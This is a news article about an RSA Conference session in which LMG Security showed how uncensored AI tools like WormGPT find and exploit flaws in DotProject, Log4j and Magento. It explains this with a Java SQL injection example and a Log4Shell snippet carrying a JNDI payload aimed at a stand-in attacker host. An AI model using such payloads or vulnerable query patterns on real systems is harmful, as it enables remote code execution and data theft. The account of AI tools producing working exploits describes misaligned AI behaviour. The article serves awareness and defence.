Experts reveal how “evil AI” is changing hacking forever at RSA Conference


Hot potato: New AI tools, designed without ethical safeguards, are empowering hackers to identify software vulnerabilities and exploit them faster than ever. Cybersecurity experts warn that traditional defences will be unable to keep up with the rapid evolution of “evil AI” platforms.

Attendees packed a room at the Moscone Center in San Francisco on a recent morning for what was billed at the annual RSA Conference as a technical exploration of the role of artificial intelligence in modern hacking.

The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory: a rare live demonstration of “evil AI” in action, a topic that has quickly moved from cyberpunk fantasy to real-world concern.

Davidoff, LMG Security’s founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm’s Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.

He introduced the concept of “evil AI” – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.

“What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?” Durrin asked the audience, previewing the unsettling demonstrations to come.

The team’s journey to acquire these rogue AIs, such as GhostGPT and DevilGPT, usually ended in frustration. Their persistence finally paid off when they found WormGPT, a tool highlighted in a post by Brian Krebs and sold through Telegram channels for $50.

Durrin explained that WormGPT was essentially ChatGPT stripped of its ethical constraints: it will answer any question, no matter how destructive or illegal the request. The presenters stressed that the real threat is not the tool itself, but its capabilities.

LMG Security began by testing an older version of WormGPT on DotProject, an open-source project management platform. The AI correctly identified an SQL injection vulnerability and suggested a basic exploit, but it failed to produce a working attack, probably because it couldn’t process the entire codebase.
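The presenters did not publish the flaw itself, so the following is only a generic illustration of the vulnerability class involved. It is a minimal sketch in Java/JDBC rather than DotProject’s PHP, with a hypothetical users table: the unsafe variant splices user input directly into the SQL string, while the safe variant parameterizes it.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class SqlInjectionDemo {

    // VULNERABLE: user input is concatenated into the SQL string, so the
    // input becomes part of the query's structure, not just its data.
    static ResultSet findUserUnsafe(Connection conn, String name) throws SQLException {
        Statement stmt = conn.createStatement();
        return stmt.executeQuery(
            "SELECT id, name FROM users WHERE name = '" + name + "'");
    }

    // SAFE: a parameterized query keeps data and SQL structure separate;
    // the driver escapes the value, so injected quotes stay inert.
    static ResultSet findUserSafe(Connection conn, String name) throws SQLException {
        PreparedStatement stmt = conn.prepareStatement(
            "SELECT id, name FROM users WHERE name = ?");
        stmt.setString(1, name);
        return stmt.executeQuery();
    }
}
```

A payload such as ' OR '1'='1 turns the unsafe query into one that matches every row, which is exactly the kind of foothold an exploit builds on.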

Then, a newer version of WormGPT (version 2.1) was tasked with analyzing the infamous Log4j vulnerability. Davidoff noted that the AI not only discovered the vulnerability but also provided enough information to create an exploit.
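Again, the session’s exact test setup wasn’t disclosed. As a reminder of why Log4j (CVE-2021-44228, “Log4Shell”) required so little information to exploit, here is a hedged sketch of the vulnerable pattern, with attacker.example standing in for a hypothetical attacker-controlled server.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Illustrative only: with vulnerable log4j-core releases (through 2.14.1),
// logging attacker-controlled input could trigger a JNDI lookup to a remote
// server, allowing remote code execution (CVE-2021-44228).
public class Log4ShellPattern {
    private static final Logger log = LogManager.getLogger(Log4ShellPattern.class);

    public static void main(String[] args) {
        // Imagine this value arrives in an HTTP header from an attacker.
        String userAgent = "${jndi:ldap://attacker.example/a}"; // hypothetical host

        // On vulnerable versions, Log4j interpolates the ${jndi:...} token and
        // fetches code from the attacker's server. Patched versions log it inertly.
        log.info("Client user agent: {}", userAgent);
    }
}
```

One logged header was enough, which is why the bug was trivial to weaponize and why an AI that can explain it poses a real risk.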

The latest iteration of WormGPT was the real shock: it offered step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.

To push the limits even further, the team simulated a vulnerable Magento e-commerce platform. WormGPT detected a two-part exploit that other security tools, such as SonarQube and even ChatGPT, failed to flag. During the live demo, the rogue AI produced a comprehensive hacking guide, unprompted and at alarming speed.

As the session came to a close, Davidoff reflected on the rapid evolution of these malicious AIs.

“I’m a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year,” she said. Yee wrote that the audience’s uneasy quiet echoed the sentiment.

Image Credit: PCWorld, LMG Security


